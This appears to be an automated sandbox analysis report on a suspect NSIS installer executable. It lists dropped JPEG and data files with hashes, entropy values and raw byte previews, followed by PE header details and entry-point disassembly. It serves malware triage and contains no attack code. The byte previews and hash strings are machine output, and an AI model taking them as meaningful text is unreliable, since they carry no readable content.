                                                    SHA-512:E444152150B4C1007FA96AA079E41D959A5A48D00D9F1D9AC15321B646F7CF4000D43825DF25EF7D69275A3CA86C029E8862AF07F873A8375B1EAAE5280A4F13
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........4.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..lY.C.v.J.).6...{S.)+.k......%.3..=k@J#.+29Da@.J..c.YJ.n...3....E;.P...v...{..&nJBO.......'......<.cT.j..[....q.d.....8<...)...Y..d.c.......tV7....\..X.;..x.kG(<W....:.4.H.[..$|r{T7..9W=..h.=+[{....+. .F8.>&_.....z.....T!tL.f<.3..4..$.5.,....N.vr7...+.......sZp.#..Y.....O.;..r.gTc..E.k.{u5.....U....E:.5p.z..j.O"3....*..f..+.d.3U..u<qE:.;..$.X.....D.....M
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 666x357, components 3
                                                    Category:dropped
                                                    Size (bytes):33760
                                                    Entropy (8bit):7.967017042537166
                                                    Encrypted:false
                                                    SSDEEP:768:4WE6omjLoyBWuDNGNceCXyQezdhoMB8q+ljUsYU1xhbU3vCW:4Uom4yBhmQi7eK8q+lpJRUfCW
                                                    MD5:B79A2EC8152E04C3DF16B5DF803ED841
                                                    SHA1:4E8FEE2ACDA813B8D6F12FF1B2B9BEDA769C05BD
                                                    SHA-256:584DC6A4106CFB60A2794937921B3B560F398558B482D5C24A1ECFB997EBEA9D
                                                    SHA-512:0DFB2B2FA92EB11B60C87D272B6B2EEA14DC2E05D53048C445772D6249F3635BBD1EE7B663F9F670FCD06C50C71839323BF2325CAEECBD9AD7D182E5733C3488
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......e...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j\R.zq]G(...z......Hi.."..E.....G.J..P..)..P.h&..L{P..r..I.;RP .R.\.]....Fh..P..b....8b...A=...4..E...\P)(.v4..4dsI.h..-..R..q.))....M..i...(.A.P.b.)2(......)E....{.G4...(.`..SE:.0..R.@...9F.-...)z.GJ^.....Z..h.4.h.i(...(....../Z)q@...ZZ^....ZP3...-.{..Z.3G..P!..:../.0.y..K.ZhCE....Z.%...E.7.`R...r>..LQ..6......j..?......&)6..O.=.q..4.1..zPE. ZO.Gj.7.Q.u.
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):271048
                                                    Entropy (8bit):1.2501527383190683
                                                    Encrypted:false
                                                    SSDEEP:1536:J3Cc9bXL6XUITHsHuh6mYsN8xVvBPJggd0Q96LJe24TSewHt/z1tIwt8iWoImuhr:JGU5Q+7bgfC97p
                                                    MD5:4CDDE62E05107CF3BAD9767453F364D5
                                                    SHA1:8C3990C82C3F9C0ECECCFC2E878F00B674556E6E
                                                    SHA-256:80EFA0744FB280C29C700886A6CD158053D0BE9C2D87F445A76C6DEA410B774B
                                                    SHA-512:A3C64E4B4DB6AEA45756BFB1C2BED5F7CA19549DE8C2D095F320DB8BC8589B01E356D033D6073CBEED9B56EDA1939BEB98E727382F5396EA3E50079125B19451
                                                    Malicious:false
                                                    Preview:........................@..................._...........................................................................................................................................-....v......R...............B..E.........................................................................7............................u.........................................................g...(..........i........j...................................................................]...c.................................^.........t..........................a............................................$................................_.........................................................U.....T............................................B.....h.....7.................w...................................................................n/..........&..............'...n......X....................Y.............................................m.......................................W..................w..!....
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 660x206, components 3
                                                    Category:dropped
                                                    Size (bytes):19024
                                                    Entropy (8bit):7.941019032399731
                                                    Encrypted:false
                                                    SSDEEP:384:G69R2kiP8DN7z8OayzjwTSQ1vI8+KvvKyMIWVx3NRGBQqxFk8nWzy1+a6Pu10IJh:GgHpXda7+2d1vezVx3NRCpnZ1+afGIJh
                                                    MD5:E9772CD90D72A4F4AF0401E7BFBA7BBA
                                                    SHA1:45DEEC11D8CE16E3DF98F6E3AC23A6B647A81535
                                                    SHA-256:53BB5626BC226D0E476A35645C2D720C1056ADFBB23DAEB5923E9264540259B9
                                                    SHA-512:BA2E24D412C69D2B1EBAEDBF5B7AC0F94544A3E9C42CDE2FB13C456217B6B0449024086D78C72F8B7C4EBA35622C56623919F64CE408471028E0A5DC6E206027
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...1N.......N./..+..&c.8."......4.Gj..L..:...^...S......".)h..V.@..1..pi.....Z...V%.t..X...#...M6..SwsY......I.z..P.@....c....i....*...J..}.t..*.t....4..*A...|....U:.~....)......[Q.f.....K.<.0.9.*D.8..<.1.G...sG$..29E.(..b.h..V.....G....N6/.F8aV.f.!{..g..c_.I.q.b.c uQ.,D.@9..~8.~...{.j.....`....`vt.j.%.G.........*.... .y.u.."....SNU<(.TIuNqm.aA.......+...
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 203x671, components 3
                                                    Category:dropped
                                                    Size (bytes):30956
                                                    Entropy (8bit):7.969499868102271
                                                    Encrypted:false
                                                    SSDEEP:768:ofYXJ6hCAlkicSla3FFc1VQC2NOF1Nuse5wExZ50vn:oQalrlaVC1uClF1NuTT5Mn
                                                    MD5:C9D3CCBEBDAFAA919122541A202A9733
                                                    SHA1:F81641E686DE3B8C884971EC5DA65D8CF4BB4D3F
                                                    SHA-256:5FDB8BED6E957D3399EC0D8A30934F1E0B2A4C5880A6EC8DF43F786BAA32A96C
                                                    SHA-512:F16B4DC339F4943E19408F386C376C50A4DA42E6DB1241EAB90B8596AF701F75421B87A1AEA10835467A3900E29E2611943DC9B89FDFAAC3E46D0546BFA83A7A
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..0..6..#...(.8o+'.:.l.H.FN...... ...$.i..$-....%.q.Gj.9......O .......)...'.....f.\lG..u..>....Q....o.hC..R.FF.C..#m.k......@c.0.OA....]..r...rel.B.S....k.......Y....?xjd.X....oT5.5...t....L.5.."6g.u.*M..V.O.....Jm..Rh....0..l..kO...U.\[.-.T.5.Y.]..R.>Q.....w.5.......![q..4.O.X'..i.G..?..a..jK5.+.b. ..^.%..qQ..T...(.GsL..N..L~...\.-.......}z.\i.q@^...R{
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 666x357, components 3
                                                    Category:dropped
                                                    Size (bytes):34638
                                                    Entropy (8bit):7.9628416848799
                                                    Encrypted:false
                                                    SSDEEP:768:4WE6omjLoyBWuDNGNceCXyQezdhoMB8q+ljUsYU1xhbU3vCL:4Uom4yBhmQi7eK8q+lpJRUfCL
                                                    MD5:5A1AD1096F97C0E2239684846D247918
                                                    SHA1:2885227167F0780AED630077007401989AFDDAEE
                                                    SHA-256:C2C9EE1D315D2D076FAADFDECF060E59877B621385A7825EDBA473BE85CCBF7F
                                                    SHA-512:2740807D4DCDB5D2CE786488047360225EC7DED2B84A215CCE00DB25E67C2A9B5C9C3E0593BA35F8E48D937E3104FFD97C3B034471639F88D3119F9B9C62B36B
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......e...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j\R.zq]G(...z......Hi.."..E.....G.J..P..)..P.h&..L{P..r..I.;RP .R.\.]....Fh..P..b....8b...A=...4..E...\P)(.v4..4dsI.h..-..R..q.))....M..i...(.A.P.b.)2(......)E....{.G4...(.`..SE:.0..R.@...9F.-...)z.GJ^.....Z..h.4.h.i(...(....../Z)q@...ZZ^....ZP3...-.{..Z.3G..P!..:../.0.y..K.ZhCE....Z.%...E.7.`R...r>..LQ..6......j..?......&)6..O.=.q..4.1..zPE. ZO.Gj.7.Q.u.
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 564x766, components 3
                                                    Category:dropped
                                                    Size (bytes):78312
                                                    Entropy (8bit):7.965760163563921
                                                    Encrypted:false
                                                    SSDEEP:1536:0aI5v5+r/WGPIAVQIhrVMZXPizutOFGlin5ZSk2iFJNfgJSYrLfEXWMo:I55e/pVQIhrqKusGkmkPnNYhX2g
                                                    MD5:B53488FB78817ABDEA984B799B644E71
                                                    SHA1:B52C3F0461B2D4827634B17A8456FE0EEACCF166
                                                    SHA-256:37E2971FE0FE1B8F445A2D90CFEFC40A614C09F04D4269DC0E39131714B71644
                                                    SHA-512:817F53CAA92582CE9F070493836EF6E925CCDFECA064C3CD8ADFFF1124542D61ED2F2DD2ABBCFC46F7CA700A43710EA78440BD16092AC41EA59D90C7E2BB13EC
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........4.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..lY.C.v.J.).6...{S.)+.k......%.3..=k@J#.+29Da@.J..c.YJ.n...3....E;.P...v...{..&nJBO.......'......<.cT.j..[....q.d.....8<...)...Y..d.c.......tV7....\..X.;..x.kG(<W....:.4.H.[..$|r{T7..9W=..h.=+[{....+. .F8.>&_.....z.....T!tL.f<.3..4..$.5.,....N.vr7...+.......sZp.#..Y.....O.;..r.gTc..E.k.{u5.....U....E:.5p.z..j.O"3....*..f..+.d.3U..u<qE:.;..$.X.....D.....M
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x236, components 3
                                                    Category:dropped
                                                    Size (bytes):6266
                                                    Entropy (8bit):7.934604994452403
                                                    Encrypted:false
                                                    SSDEEP:192:LageUe3z8q30+rTymq37MvDe0QQCtvOdjxvIqwgOdTsx3W:OQeJ3trT1cMvD2jvO7vIqwgOdTaW
                                                    MD5:D154965D450CABB2873570BBB6BCEE1F
                                                    SHA1:B69F899F37D407E34F7391B278C08140F22A8D4F
                                                    SHA-256:8EAF9B50CE1AE80F9A033C88D393FABFF9033E1D8485B411594889DD23AEEB48
                                                    SHA-512:6483603905A6B6566F45C7F26EFC549D371A96DEFD57B29DD96AE8890EE481964C9E682A1077AEFC8D10F8366FADEAFE9FC0DE12477D0265C70D3BC629E53B3E
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..a..;z..6+.H.5$.o\.....h..vc.^.c..2...d..f...S....>..$..y8....<q...O:Z.,.$s..e..b.0...\.v........:.Y"9.z...9.\....aV.T....1U$..KcD.....9..G..e...........H#.?....S..+..hW..x.......1.T...6s.....;h.ym ..4*..2E..V2I=...7w.t,UD...Z.9..V<.$.=j.d...zc.J........x.J.4y ....X.A...PH.~S.Kn.I...1;....pOJEr$a.r8.......4.D...s..ZRf.b..$...O|..3ax..WE;..?Z....<t8....
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 564x766, components 3
                                                    Category:dropped
                                                    Size (bytes):77820
                                                    Entropy (8bit):7.966308391338044
                                                    Encrypted:false
                                                    SSDEEP:1536:0aI5v5+r/WGPIAVQIhrVMZXPizutOFGlin5ZSk2iFJNfgJSYrLfEXWMz:I55e/pVQIhrqKusGkmkPnNYhX2r
                                                    MD5:69FAD6C6022F82800FD9AA55EAFF43DF
                                                    SHA1:C34951D82990B356BCB2CAE1B24690AAA9A558AB
                                                    SHA-256:D765417E77F1604852B08BF8E3FC78B08DB3947AE0456B7DA5A7E272D83B1426
                                                    SHA-512:324D713ECDE5AAFCEE49721D65936E3B8646F482521D971059E4D90908EAAA0CD7F0FE47159529935C3589F5892AB9F930AE74630EDBECC81CC68B7FC5FBA227
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........4.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..lY.C.v.J.).6...{S.)+.k......%.3..=k@J#.+29Da@.J..c.YJ.n...3....E;.P...v...{..&nJBO.......'......<.cT.j..[....q.d.....8<...)...Y..d.c.......tV7....\..X.;..x.kG(<W....:.4.H.[..$|r{T7..9W=..h.=+[{....+. .F8.>&_.....z.....T!tL.f<.3..4..$.5.,....N.vr7...+.......sZp.#..Y.....O.;..r.gTc..E.k.{u5.....U....E:.5p.z..j.O"3....*..f..+.d.3U..u<qE:.;..$.X.....D.....M
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):252988
                                                    Entropy (8bit):1.258435768634305
                                                    Encrypted:false
                                                    SSDEEP:1536:Ffup5V9mQ4FqyWKrbCGsV2kLUY+mvKDFHHe4w/Lm65l32C+8zQNrpQJu0jx23uf5:1lMpKEfpd
                                                    MD5:E19F0FF07EFE63E8B30B92E64C3279C1
                                                    SHA1:7855F6FBD8FC96F485B4140A85A4D5CBD31F1AF9
                                                    SHA-256:4CE892AA1B8B8CFFC9835C703FABC69087F82490FB46E889D6C07280DCE64E03
                                                    SHA-512:030264903EFB58841058997648E112F3AC89EE4D9EA038D96F1CD132A59B2B0A3D6BCB4DD99DA62279835408453F84CF3AF492E1D53910C8AE29CCE386E2D5CB
                                                    Malicious:false
                                                    Preview:......................g........................P.......<.%}...........s...................Y.........M........................D.......................R...............................^............................................................................\.......................................................................................i........}.....j............%...........................................d.................._..............................Q..........................................@..............................................o...................;...*..?..........g..................................................................................................................................*.....X.................`.....%..............[.....Q..........2.`.................................."L................................v................(..............-...................................................................".......................................
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 253x460, components 3
                                                    Category:dropped
                                                    Size (bytes):9249
                                                    Entropy (8bit):7.859769804343658
                                                    Encrypted:false
                                                    SSDEEP:192:Lg3GVbPdwh/TkYJFxFd5Ynr9rwP8eiJnuLq6dIUfvF3g5/S+4DHEk:k3GVbPdSwYJn5Yr9rNJuLq6d1nF6S+4F
                                                    MD5:99568CF7EA7AB982BEBEC6E8C9736699
                                                    SHA1:656B55183279F357ABE336F6359C4AEDB5FB4AD6
                                                    SHA-256:B9FCD205A8B2A819D6774B0F217334C24E508A02BA504D24CE3438C17AAE630A
                                                    SHA-512:C7408A24197C4BF2B14C3AD43840851EB14325E60490998E1625FEC3CE538CB8B4EC1C9A71836990E0EB4EE922040217EC0989FD6E6D4F5BC4FCC3F3FDA0FB10
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..*JZJ.JZJ(.h...QE%- .(...-.P..E%-&..i..i..J(....Q@.KHh......BR.JQ@.V..E......%8.h...i.2..4......K@.KE..R.R....Q@..QHh.E- .4.Zi.f.i......(4Q@..)i(...JZ.)E%(.@.-IQ.Z......{S(...*N.....%.S...Z(...(..............Q@..Q@.%-%..(....(4.JJZJ....P..AK@.Z.TKR..1..GR5Fz.4....z.1.RR........(...ZJ(.h..@-....);.J.(...-%-%.-..C@.4.)(..ZJZ.QKM...$.".B.Z.b.J...Fh.S.Z.ja.h....e.E.P.E.P
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 564x766, components 3
                                                    Category:dropped
                                                    Size (bytes):79085
                                                    Entropy (8bit):7.963718594699245
                                                    Encrypted:false
                                                    SSDEEP:1536:0aI5v5+r/WGPIAVQIhrVMZXPizutOFGlin5ZSk2iFJNfgJSYrLfEXWMn:I55e/pVQIhrqKusGkmkPnNYhX2P
                                                    MD5:48951E338D32805997DA47E7122CA34C
                                                    SHA1:FB7A57BEAAC5B15E081DCF5A54947107FB9DF9C0
                                                    SHA-256:62D4D8C14C5BC21B8FC7BAC1BC1C8A272404C5516871E574D9E65EEF00787D11
                                                    SHA-512:7BC3831B4274EB53F5F40C59C41456C35005FEFDD486774DA41287EA46CC33E2858C0DAE2BBE9FD12EB63BD7BA8460D8B184AB316340B45E90C939821B92D2E7
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........4.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..lY.C.v.J.).6...{S.)+.k......%.3..=k@J#.+29Da@.J..c.YJ.n...3....E;.P...v...{..&nJBO.......'......<.cT.j..[....q.d.....8<...)...Y..d.c.......tV7....\..X.;..x.kG(<W....:.4.H.[..$|r{T7..9W=..h.=+[{....+. .F8.>&_.....z.....T!tL.f<.3..4..$.5.,....N.vr7...+.......sZp.#..Y.....O.;..r.gTc..E.k.{u5.....U....E:.5p.z..j.O"3....*..f..+.d.3U..u<qE:.;..$.X.....D.....M
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 660x206, components 3
                                                    Category:dropped
                                                    Size (bytes):18366
                                                    Entropy (8bit):7.960531856269744
                                                    Encrypted:false
                                                    SSDEEP:384:G69R2kiP8DN7z8OayzjwTSQ1vI8+KvvKyMIWVx3NRGBQqxFk8nWzy1+a6Pu10IJ0:GgHpXda7+2d1vezVx3NRCpnZ1+afGIJ0
                                                    MD5:D0B061FE143A45224AF28C219D85EC29
                                                    SHA1:98EC46FB584AFFF14AB2B9D8DBD914C2F82DB58B
                                                    SHA-256:DDD6D841667588C40373273F4ACE25CD8E25C527BC4B15160A4BD95D5F5F859A
                                                    SHA-512:D6035392C1E6D28B01CF4AD9025E9E43B64CAAD772B6FBF2F0D239CDC5F2B1DB3266DEAC88DC73B3C443D8755582E9E99B86642BE67E693447B5B70E79116A48
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...1N.......N./..+..&c.8."......4.Gj..L..:...^...S......".)h..V.@..1..pi.....Z...V%.t..X...#...M6..SwsY......I.z..P.@....c....i....*...J..}.t..*.t....4..*A...|....U:.~....)......[Q.f.....K.<.0.9.*D.8..<.1.G...sG$..29E.(..b.h..V.....G....N6/.F8aV.f.!{..g..c_.I.q.b.c uQ.,D.@9..~8.~...{.j.....`....`vt.j.%.G.........*.... .y.u.."....SNU<(.TIuNqm.aA.......+...
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 660x206, components 3
                                                    Category:dropped
                                                    Size (bytes):17926
                                                    Entropy (8bit):7.964086895083405
                                                    Encrypted:false
                                                    SSDEEP:384:G69R2kiP8DN7z8OayzjwTSQ1vI8+KvvKyMIWVx3NRGBQqxFk8nWzy1+a6Pu10IJy:GgHpXda7+2d1vezVx3NRCpnZ1+afGIJy
                                                    MD5:226BA095D6E35AE7575FF844DA0C0293
                                                    SHA1:D50131B137CAA1464076A0F6B1AB1ADA6E99234E
                                                    SHA-256:307B12DABB919A69383409A5064E70DCD0CD4903C9E94814D10C540312F0BE73
                                                    SHA-512:3BEC4961D0682F6ECA723A8838DB446F5152C34D82B9EEE7CE2B80724F63BAB6D4A3BE0C0B5418E7831F04AD8236697B7E4820ECE601878471AAA2184488121A
                                                    Malicious:false
                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...1N.......N./..+..&c.8."......4.Gj..L..:...^...S......".)h..V.@..1..pi.....Z...V%.t..X...#...M6..SwsY......I.z..P.@....c....i....*...J..}.t..*.t....4..*A...|....U:.~....)......[Q.f.....K.<.0.9.*D.8..<.1.G...sG$..29E.(..b.h..V.....G....N6/.F8aV.f.!{..g..c_.I.q.b.c uQ.,D.@9..~8.~...{.j.....`....`vt.j.%.G.........*.... .y.u.."....SNU<(.TIuNqm.aA.......+...
                                                    Process:C:\Users\user\Desktop\MNLS4PjscF.exe
                                                    File Type:huf output
                                                    Category:dropped
                                                    Size (bytes):458176
                                                    Entropy (8bit):1.246204574944222
                                                    Encrypted:false
                                                    SSDEEP:1536:xRWO2EIpW61fXKYiZAiYUQZF4Ce2spug3ZcCQy0kTwxdwBl9qiJsuQKSA4o6LOzv:seFwClmyQzweu
                                                    MD5:F507FD73B5683DFB9ECE04A486CF8E21
                                                    SHA1:171A7FF1F5C92A75FF2787021BA6750FEF68213F
                                                    SHA-256:9AEAFCD46AA3D1B660FB1A3A8F10C21D28C80A50BF37A23D9ECA444A51557065
                                                    SHA-512:B6124C979EF1DC6946F95EACAA369E4EABB9B0E32781197A8A2686FA2FEDB69B123B274EB19E82E4AD781FB49D6F74A96E1B38C147C7AC163C5430DD084C7D2F
                                                    Malicious:false
                                                    Preview:....................................................................................................<....................q.......................u....c............................................................C.....k..................................#..............P......k............N...............I.................................................S!...........................................................Z...........u.................m...........................................................................)..............................................................................8..................................................................p............................D....u........................................G...............[...$.......~............E............t...........1u...........................................................................................................].............................4.....................................................
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.956197504044966
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:MNLS4PjscF.exe
                                                    File size:883'660 bytes
                                                    MD5:7730242b95171f0ccb03e28bf8f5056b
                                                    SHA1:a5348671e4b92b3c64086abe6fced83f251e692c
                                                    SHA256:2baf2894d28fffff439499fbcd6b92714febd8ea39c0850f60f4575adedef15b
                                                    SHA512:74a89a765c1d138b3e9c90a0cbb3768ded91ceb7140d99b97b8aec2392e88e58d3b46a657db6738f8effa59743ae6e4eab19bc264944273adaa7543dfab9626c
                                                    SSDEEP:12288:Zt1Y3a5Pi5kV98nWGjFxN1bIyPA2lKZ7SimXcL9WIoXygi+VIfX+SPA4c5Wj6wnM:VY0Pi5kId5F55lc7zmXcLEr9t4UkM
                                                    TLSH:1A1523005BDD8666EAE521B36D7381AAC3779E968553820F5F443F7B3C342B184A32DB
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....f.R.................`...*......X3.......p....@
                                                    Icon Hash:a5d56872428d9074
                                                    Entrypoint:0x403358
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                    Instruction
                                                    sub esp, 000002D4h
                                                    push ebx
                                                    push ebp
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    xor ebp, ebp
                                                    pop esi
                                                    mov dword ptr [esp+14h], ebp
                                                    mov dword ptr [esp+10h], 00409230h
                                                    mov dword ptr [esp+1Ch], ebp
                                                    call dword ptr [00407034h]
                                                    push 00008001h
                                                    call dword ptr [004070BCh]
                                                    push ebp
                                                    call dword ptr [004072ACh]
                                                    push 00000008h
                                                    mov dword ptr [00429298h], eax
                                                    call 00007F09F87DDC6Ch
                                                    mov dword ptr [004291E4h], eax
                                                    push ebp
                                                    lea eax, dword ptr [esp+34h]
                                                    push 000002B4h
                                                    push eax
                                                    push ebp
                                                    push 00420690h
                                                    call dword ptr [0040717Ch]
                                                    push 0040937Ch
                                                    push 004281E0h
                                                    call 00007F09F87DD8D7h
                                                    call dword ptr [00407134h]
                                                    mov ebx, 00434000h
                                                    push eax
                                                    push ebx
                                                    call 00007F09F87DD8C5h
                                                    push ebp
                                                    call dword ptr [0040710Ch]
                                                    cmp word ptr [00434000h], 0022h
                                                    mov dword ptr [004291E0h], eax
                                                    mov eax, ebx
                                                    jne 00007F09F87DADBAh
                                                    push 00000022h
                                                    mov eax, 00434002h
                                                    pop esi
                                                    push esi
                                                    push eax
                                                    call 00007F09F87DD316h
                                                    push eax
                                                    call dword ptr [00407240h]
                                                    mov dword ptr [esp+18h], eax
                                                    jmp 00007F09F87DAE7Eh
                                                    push 00000020h
                                                    pop edx
                                                    cmp cx, dx
                                                    jne 00007F09F87DADB9h
                                                    inc eax
                                                    inc eax
                                                    cmp word ptr [eax], dx
                                                    je 00007F09F87DADABh
                                                    add word ptr [eax], 0000h
                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x5040.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
